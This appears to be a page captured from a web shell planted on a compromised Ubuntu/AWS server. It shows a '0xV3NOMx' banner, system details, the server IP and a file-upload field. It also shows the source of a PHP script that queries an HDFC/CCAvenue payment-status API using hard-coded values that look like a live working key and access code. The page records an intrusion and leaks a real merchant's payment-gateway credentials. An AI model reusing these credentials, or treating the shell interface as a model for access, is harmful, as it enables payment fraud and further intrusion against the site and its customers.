0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 3.15.138.214


Current Path : /proc/thread-self/root/var/www/html/nehu/hdfc/
Upload File :
Current File : //proc/thread-self/root/var/www/html/nehu/hdfc/ccavStatusAPI.php

<?php 
	include('HDFCAPI.php');
	error_reporting(0);
	
	$resfinal = getAPIRes("A09AC9FE6C4F6291596D0195E51A0556","AVQP87GI58AJ95PQJA","HDFC2023121208435116468286");
	$b = json_decode($resfinal,true);
	var_dump($b);

?>